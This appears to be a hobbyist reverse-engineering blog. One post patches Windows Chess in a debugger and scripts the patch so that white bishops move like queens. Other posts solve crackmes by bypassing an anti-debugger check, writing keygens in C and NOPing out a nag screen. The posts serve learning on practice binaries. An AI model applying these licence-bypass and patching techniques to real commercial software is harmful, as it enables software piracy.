Bishop::GetPassiveMoves(int const * *) .text 0102D70A 00000017 R . . . B . .
Bishop::GetPieceType(void)             .text 0102D726 00000004 R . . . . . .
Rook::Rook(ESide)                      .text 0102D72F 0000001D R . . . B . .
Rook::Clone(void)                      .text 0102D751 0000002B R . . . . . .

So there seem to be two outliers, knights and pawns. Knights have extra moves like canjump, and pawns can move certain places depending on other pieces, so this makes sense. Also, this gives us a big clue that these classes contain some of the logic we can use to determine which piece can move where.

So how should I beat my dad? He’s not a grandmaster, so maybe if I made bishops move like queens for me that would do the trick. There is also a board class, so another idea I had was to replace the bishops with queens when the board was setup, but that’s not the route I went.

There’s this function getpassivemove common to all the classes

0:010> x chess!*getpassivemove*
009bd781 Chess!Rook::GetPassiveMoves = <no type information>
009bd7f8 Chess!Queen::GetPassiveMoves = <no type information>
009bd67f Chess!Knight::GetPassiveMoves = <no type information>
009bd5d6 Chess!Pawn::GetPassiveMoves = <no type information>
009bd87b Chess!King::GetPassiveMoves = <no type information>
009bd70a Chess!Bishop::GetPassiveMoves = <no type information>

Setting a bp here it’s tough to tell what’s going on because it’s hit so frequently, but the functions are really simple, and for the most part they look VERY similar between pawn/rook/knight/king/etc classes

So let’s just replace the first instruction to jump to the other function. I had mona loaded into windbg here, but you can also do this with the metasploit asm shell or nasm.

What this does is modify the Chess!Bishop::GetPassiveMoves function and has it immediately jump to Chess!Queen::GetPassiveMoves. (The addresses on your box will certainly be different)

0:010> !py mona asm -s "mov eax, 0x0076d7f8#jmp eax"
Hold on...
Opcode results : 
---------------- 
 mov eax, 0x0076d7f8 = \xb8\xf8\xd7\x76\x00
 jmp eax = \xff\xe0
 Full opcode : \xb8\xf8\xd7\x76\x00\xff\xe0 

[+] This mona.py action took 0:00:02.172000

0:010> eb 0076d5d6 b8 f8 d7 76 00 ff e0
0:010> uf Chess!bishop::GetPassiveMoves
Flow analysis was incomplete, some code may be missing
Chess!bishop::GetPassiveMoves:
0076d5d6 b8f8d77600      mov     eax,offset Chess!Queen::GetCaptureMoves (0076d7f8)
0076d5db ffe0            jmp     eax
0:010> g

Sure enough, this works. When we run we can move anywhere with our bishops

powerful_bishop

Problems

At this point, even though we can move anywhere, we still have two problems we need to solve. 1) both black and white can move anywhere, so this doesn’t give me an advantage. What I really want is just white to be able to move anywhere 2) We can’t just write to this address because of ASLR and also because it’s a read only section of memory.

What does it mean for us that ASLR is enabled? Any static addresses will likely change from run to run of the chess game. Looking for non-aslred modules, there are none. By the way, I’m using mona here.

0:000> !py mona noaslr
Hold on...
No aslr & no rebase modules :
[+] Generating module info table, hang on...
    - Processing modules
    - Done. Let's rock 'n roll.
----------------------------------------------------------------------------------------------------------------------------------
 Module info :
----------------------------------------------------------------------------------------------------------------------------------
 Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
----------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------

So for us, we can’t really rely on any hard coded addresses.

Additionally, even if we solved ASLR, our hard jump strategy will also fail because both white and black call the GetPassiveMoves function. We need a way to only modify that function for white.

Figuring out Whose Turn it is

Getting turn info took a bit of shooting in the dark also, but because of symbols it was relatively easy to track down.

First I put a breakpoint here:

bp Chess!GameState::GetTurn +3 "r eax; g"

This is called a lot, and it seems to return 2 or 0 for white, and 0, 1, or 2 for black. This function will probably work, but there’s another turn function too named toggleturn, so lets try that. This function seems perfect – it’s called once after every move. We can see it’s testing the value in [ecx+4] so we inspect that, and sure enough it’s 1 before a white move and 0 before a black move

bp Chess!GameState::toggleturn
dd ecx + 4

Programatically Changing the Game

I’m going to programattically debug the process. The way the uninformed post did things was cool, but it’s (more) difficult to go route way because we’re not messing with data, we’re messing with the program which is non writable. So how do we programatically debug?

There are a ton of ways. Mona uses this and it looks awesome: http://pykd.codeplex.com/. I’m a python guy, so usually I’d go that route, but I’m trying to learn powershell so I decided to try going that route and use this http://powerdbg.codeplex.com/. For the powershell to work you need to install this module.

The first thing I want to do is change the hard coded value to something I can switch back and forth. So I tried setting a breakpoint that I could disable per turn

bp Chess!Bishop::GetPassiveMoves "r eip=Chess!Queen::GetPassiveMoves;g"

This was waaaay too slow for the game to be playable. I had to figure out something else. This is when I noticed just how similar the getpassivemoves functions are

0:012> uf Chess!Bishop::GetPassiveMoves
Chess!Bishop::GetPassiveMoves:
00c5d70a 8bff            mov     edi,edi
00c5d70c 55              push    ebp
00c5d70d 8bec            mov     ebp,esp
00c5d70f 8b4508          mov     eax,dword ptr [ebp+8]
00c5d712 c700f07ec300    mov     dword ptr [eax],offset Chess!Bishop::sPassiveMoves (00c37ef0)
00c5d718 a1e87ec300      mov     eax,dword ptr [Chess!Bishop::sPassiveMovesCount (00c37ee8)]
00c5d71d 5d              pop     ebp
00c5d71e c20400          ret     4
0:012> uf Chess!queen::GetPassiveMoves
Chess!Queen::GetCaptureMoves:
00c5d7f8 8bff            mov     edi,edi
00c5d7fa 55              push    ebp
00c5d7fb 8bec            mov     ebp,esp
00c5d7fd 8b4508          mov     eax,dword ptr [ebp+8]
00c5d800 c700b880c300    mov     dword ptr [eax],offset Chess!Queen::sPassiveMoves (00c380b8)
00c5d806 a1b080c300      mov     eax,dword ptr [Chess!Queen::sPassiveMovesCount (00c380b0)]
00c5d80b 5d              pop     ebp
00c5d80c c20400          ret     4

They’re very close, and they’re the exact same number of bytes. We can just edit things on the fly, replacing the queen’s code with the bishop’s code and back again.

Import-Module PowerDbg

#global vars, populated later
$bishop_code = ""
$queen_code = ""


function bishop_to_queen
{
    $command =  "eb Chess!Bishop::GetPassiveMoves+a " + $queen_code
    Invoke-DbgCommand $command
}

function bishop_restore
{
    $command = "eb Chess!Bishop::GetPassiveMoves+a " + $bishop_code
    Invoke-DbgCommand $command
}


New-DbgSession -command 'C:\Program Files\Microsoft Games\Chess\Chess.exe'
Load-PowerDbgSymbols "srv*c:\debug*http://msdl.microsoft.com/download/symbols"


#get the bytes for the different bishop and queen functions
$bishop_array = (Invoke-DbgCommand "db Chess!Bishop::GetPassiveMoves+a L7").Split(" ")[2..8]
$bishop_code = [string]::join(" ", $bishop_array)

$queen_array = (Invoke-DbgCommand "db Chess!queen::GetPassiveMoves+a L7").Split(" ")[2..8]
$queen_code = [string]::join(" ", $queen_array)


bishop_to_queen


$white_turn = $true
Invoke-DbgCommand "bp Chess!GameState::ToggleTurn"


#this loops once per turn
while($true)
{
    if ($white_turn -eq $true)
    {
        $white_turn = $false
        bishop_to_queen
    }
    else
    {
        $white_turn = $true
        bishop_restore
    }

    $ret_error = Invoke-DbgCommand "g"

    if ($ret_error.Contains("No runnable debugees"))
    {
        break;
    }

}

And there we go, a runnable chess game where white bishops are super powerful. There are a few quirks, like if a bishop gets a king into checkmate with a queen move it doesn’t seem to register and you can kill the king and keep playing, but overall pretty good :)

king_killed

I am still a noob at reversing, but this was still a fun afternoon :)

Reverseme Windows Keygen

This one was challenging for me, and took me several hours, but was fun. I got caught up on certain parts that may not have been too difficult, but, yeah…

http://crackmes.de/users/tripletordo/ice9/

You can download the executable here Ice9.zip.

The first thing I noticed is probably the ‘trick’ which was simply a call to isdebuggerpresent. I modified the assembly immediately after from JNE to JE so that it only runs if a debugger is present, allowing me to attach my debugger.

00401071 74 0A JE SHORT Ice9.0040107D

This took a lot of trial and error. My strategy was to replicate the logic. Once I got to the point ‘ecx at 0040119c’ I was home free.

#include <iostream>
#include <string>
using namespace std;

void main (int argc, char *argv[]) {
  if ( argc != 2) {
    cout<<"Bad usage, enter a name > 4 letters"<<endl;
	return;
  }
  string name = argv[1];
  string ostring = name;
  int i;
  //first reverse the string
  for (i=0; i<name.length(); i++) {
    name[i] = ostring [name.length()-i-1];
  }
  
  if (name.length() < 4) {
    cout << "name must be more than 4 letters chief"<<endl;
	return;
  }
  

  int v1 = 0;
  int cum = 0;
  for (i=1; i<name.length(); i++) {
    v1 = name[i];
	if (name[i] <= 90) {
	  if (v1 >= 65)
	    v1 += 44;
	}
	cum += v1;
  } //ecx at 0040119C
  
  cum = 9 * (12345 * (cum + 666) - 23);
  
  char chr_403119 [122];
  unsigned int v;
  i=0;
  //no bounds checking
  do {
    v = cum;
	cum /= 0xA;
	chr_403119[i++] = v % 10 + 48;
  } while (v / 10);
  chr_403119[i] = '\0';
  
  printf ("%s", chr_403119);
  string serial = "";

  //reverse the string
  for (; i >= 0; --i) {
    serial += chr_403119[i];
  }
  cout<<serial<<endl;
  
  //append all chars except the 'first' three to the end 
  for (i=3; i< ostring.length(); i++) {
    serial += ostring[i];
  }
  
  cout<<serial<<endl;

}

My plan on this one, since it was interesting enough and because it’s relatively easy to break at the final value, is to break this a completely different way. I’d like to write a python debugging script that bypasses the isdebuggerpresent and just grabs the final value in the compare at 004011FF. This should be relatively straightforward, and hopefully a good ‘hello, world’ to the world of python debugging. Stay tuned.

Reverseme: Namegenme

This guy is here: http://crackmes.de/users/moofy/moofys_namegenme/

namegenme.zip

I had a fairly hard time with this one for some reason, although the solution was right in front of my face…

Most the logic for calculating the generation is in the function 00401852. The Serial is stored in a global variable, and the name is generated by taking certain bytes from the serial and doing addition on them.

Here is all the relevant logic, although finding it was sort of a pain.


.text:004018FD                 lea     eax, [ebp+var_10]
.text:00401900                 add     dword ptr [eax], 4
.text:00401903                 lea     eax, [ebp+var_14]
.text:00401906                 sub     dword ptr [eax], 3
.text:00401909                 lea     eax, [ebp+var_18]
.text:0040190C                 sub     dword ptr [eax], 2
.text:0040190F                 lea     eax, [ebp+var_1C]
.text:00401912                 add     dword ptr [eax], 2
.text:00401915                 lea     eax, [ebp+var_20]
.text:00401918                 dec     dword ptr [eax]
.text:0040191A                 lea     eax, [ebp+var_24]
.text:0040191D                 add     dword ptr [eax], 3
.text:00401920                 lea     eax, [ebp+var_28]
.text:00401923                 sub     dword ptr [eax], 2
.text:00401926                 lea     eax, [ebp+var_2C]
.text:00401929                 sub     dword ptr [eax], 4
.text:0040192C                 lea     eax, [ebp+var_30]
.text:0040192F                 add     dword ptr [eax], 3
.text:00401932                 lea     eax, [ebp+var_34]
.text:00401935                 inc     dword ptr [eax]

Here is a keygen written in C

void main(int argc, char* argv[]) {

  char Name [10];
  char* ser = argv[1];
  if (argc != 2 || strlen(argv[1]) < 21) {
    printf("Invalid serialn");
	return (-1);
  }

  Name[0] = ser[0] + 4;
  Name[1] = ser[1] - 3;
  Name[2] = ser[2] - 2;
  Name[3] = ser[6] + 2;
  Name[4] = ser[7] - 1;
  Name[5] = ser[8] + 3;
  Name[6] = ser[13] - 2;
  Name[7] = ser[14] - 4;
  Name[8] = ser[15] + 3;
  Name[9] = ser[20] + 1;
  Name[10] = "\0";

  printf("Name: %sn", Name);
}

Windows Password, geygen, password reverseme

Sat for an evenin’ o’ fun this holiday season.  I like these easy ones.  Last month I tried a harder one and found it discouraging.  I don’t have the sort of time to work on these for a full day, so these couple hour ones are a lot more fun to me at this point.

I found the binary on crackmes.de, here is a mirror.

Part 1: Find the Password.

Really easy.  Even me a beginner figured this out in about half an hour.  First thing it does is make sure the input is 8 characters long.  If it’s not it exits the program.

004013B7  |. 890424         MOV DWORD PTR SS:[ESP],EAX               ; |
004013BA  |. E8 B1060000    CALL &lt;JMP.&amp;msvcrt.strlen&gt;                ; strlen
004013BF  |. 83F8 08        CMP EAX,8
004013C2  |. 74 05          JE SHORT CrackMe#.004013C9               ;  if strlen(pass) == 8 (if it's not, 'something went wrong')
004013C4  |. E9 2C010000    JMP CrackMe#.004014F5

Next it goes through a little loop which compares each letter of the password you entered with the real password

004013C9  |> C745 F4 000000>MOV DWORD PTR SS:[EBP-C],0
004013D0  |> 837D F4 07     /CMP DWORD PTR SS:[EBP-C],7              ;  looks like for (i =0; i<7; i++) probably
004013D4  |. 7F 20          |JG SHORT CrackMe#.004013F6
004013D6  |. 8D45 F8        |LEA EAX,DWORD PTR SS:[EBP-8]
004013D9  |. 0345 F4        |ADD EAX,DWORD PTR SS:[EBP-C]
004013DC  |. 8D50 E0        |LEA EDX,DWORD PTR DS:[EAX-20]           ;  edx = ptr(ebp - 8) + ptr(ebp - c)
004013DF  |. 8D45 F8        |LEA EAX,DWORD PTR SS:[EBP-8]
004013E2  |. 0345 F4        |ADD EAX,DWORD PTR SS:[EBP-C]
004013E5  |. 83E8 20        |SUB EAX,20                              ;  eax = edx - 20
004013E8  |. 0FB600         |MOVZX EAX,BYTE PTR DS:[EAX]
004013EB  |. FEC0           |INC AL
004013ED  |. 8802           |MOV BYTE PTR DS:[EDX],AL
004013EF  |. 8D45 F4        |LEA EAX,DWORD PTR SS:[EBP-C]
004013F2  |. FF00           |INC DWORD PTR DS:[EAX]
004013F4  |.^EB DA          \JMP SHORT CrackMe#.004013D0
004013F6  |> 8D45 C8        LEA EAX,DWORD PTR SS:[EBP-38]            ; ||||||||
004013F9  |. 8D55 D8        LEA EDX,DWORD PTR SS:[EBP-28]            ; ||||||||
004013FC  |. 894424 04      MOV DWORD PTR SS:[ESP+4],EAX             ; ||||||||
00401400  |. 891424         MOV DWORD PTR SS:[ESP],EDX               ; ||||||||
00401403  |. E8 58060000    CALL <JMP.&msvcrt.strcmp>                ; |||||||\strcmp
00401408  |. 85C0           TEST EAX,EAX                             ; |||||||if this doesn't = 0 exit 'something went wrong'
0040140A  |. 0F85 E5000000  JNZ CrackMe#.004014F5                    ; |||||||
00401410  |. C70424 FE31400>MOV DWORD PTR SS:[ESP],CrackMe#.004031FE ; |||||||ASCII 0A,"Stage 1 co"

If you look closely it compares every letter + 1 to QbTTx1sE.  Meaning of course that the password is simply: PaSSw0rD

Part 2: KeyGen

The next part was a little more tricky for me.

On the screen you enter a name and a corresponding serial.

STAGE 2
00401423  |. E8 68060000    CALL <JMP.&msvcrt.printf>                ; |||||\printf
00401428  |. C70424 D331400>MOV DWORD PTR SS:[ESP],CrackMe#.004031D3 ; |||||ASCII "*******
0040142F  |. E8 5C060000    CALL <JMP.&msvcrt.printf>                ; ||||\printf
00401434  |. C70424 1E32400>MOV DWORD PTR SS:[ESP],CrackMe#.0040321E ; ||||ASCII 0A,"Name [2<=c"
0040143B  |. E8 50060000    CALL <JMP.&msvcrt.printf>                ; |||\printf
00401440  |. 8D45 B8        LEA EAX,DWORD PTR SS:[EBP-48]            ; |||
00401443  |. 894424 04      MOV DWORD PTR SS:[ESP+4],EAX             ; |||ebp -48 or esp +4 = name
00401447  |. C70424 FB31400>MOV DWORD PTR SS:[ESP],CrackMe#.004031FB ; |||ASCII "%s"
0040144E  |. E8 2D060000    CALL <JMP.&msvcrt.scanf>                 ; ||\scanf
00401453  |. C70424 3632400>MOV DWORD PTR SS:[ESP],CrackMe#.00403236 ; ||ASCII "Serial : "
0040145A  |. E8 31060000    CALL <JMP.&msvcrt.printf>                ; |\printf
0040145F  |. 8D45 B0        LEA EAX,DWORD PTR SS:[EBP-50]            ; |
00401462  |. 894424 04      MOV DWORD PTR SS:[ESP+4],EAX             ; |ebp -50 = serial
00401466  |. C70424 4132400>MOV DWORD PTR SS:[ESP],CrackMe#.00403241 ; |ASCII "%d"
0040146D  |. E8 0E060000    CALL <JMP.&msvcrt.scanf>                 ; \scanf
00401472  |. C745 F4 000000>MOV DWORD PTR SS:[EBP-C],0
00401479  |. C745 F4 000000>MOV DWORD PTR SS:[EBP-C],0
00401480  |> 8D45 B8        /LEA EAX,DWORD PTR SS:[EBP-48]           ; |
00401483  |. 890424         |MOV DWORD PTR SS:[ESP],EAX              ; |strlen (name)
00401486  |. E8 E5050000    |CALL <JMP.&msvcrt.strlen>               ; \strlen
0040148B  |. 3945 F4        |CMP DWORD PTR SS:[EBP-C],EAX            ;  while loop (for i = len(name)
0040148E  |. 77 1A          |JA SHORT CrackMe#.004014AA
00401490  |. 8D45 F8        |LEA EAX,DWORD PTR SS:[EBP-8]
00401493  |. 0345 F4        |ADD EAX,DWORD PTR SS:[EBP-C]
00401496  |. 83E8 40        |SUB EAX,40
00401499  |. 0FBE00         |MOVSX EAX,BYTE PTR DS:[EAX]
0040149C  |. 0345 B4        |ADD EAX,DWORD PTR SS:[EBP-4C]
0040149F  |. 48             |DEC EAX
004014A0  |. 8945 B4        |MOV DWORD PTR SS:[EBP-4C],EAX
004014A3  |. 8D45 F4        |LEA EAX,DWORD PTR SS:[EBP-C]
004014A6  |. FF00           |INC DWORD PTR DS:[EAX]                  ;  pointer to 0,1,...,length
004014A8  |.^EB D6          \JMP SHORT CrackMe#.00401480
004014AA  |> 8B45 B4        MOV EAX,DWORD PTR SS:[EBP-4C]            ; |||||eax calculated in loop, compared with serial
004014AD  |. 3B45 B0        CMP EAX,DWORD PTR SS:[EBP-50]            ; |||||
004014B0  |. 75 43          JNZ SHORT CrackMe#.004014F5              ; |||||
004014B2  |. C70424 4432400>MOV DWORD PTR SS:[ESP],CrackMe#.00403244 ; |||||ASCII 0A,"Stage 2 Co"

Although it can be a bit hard to read because of all the pointers (at least for me), it is definitely possible to discern the for loop and figure out it’s computing some value based on the name and writing to the same space (ebp – 4c) at every iteration.  This value is then compared to the serial to determine if the serial is valid or not.  After setting some breakpoints it becomes clear that  every value of the name -1 is added together and compared to the serial.  Here is a working keygen.

#include <iostream>
#include <string>

using namespace std;

int main()
{
    string name = "";
    cout << "name: ";
    cin >> name;
    int total = 0;
    for(int i=0; i<name.length(); i++)
    {
            total += name[i];
    }
    total -= (name.length() + 1);
    cout << "Serial should be " << total << endl;

    system("PAUSE");
    return 0;
}

Part 3

This part was theoretically easy, but a bit hard for me to execute.  The goal is to remove a console nag.

004014DD  |. E8 AE050000    CALL <JMP.&msvcrt.printf>                ; |\printf

That line needs to turn to a nop.  In ollydbg just right click as say fill with nop, and it should be good.

Follow

Get every new post delivered to your Inbox.

Join 39 other followers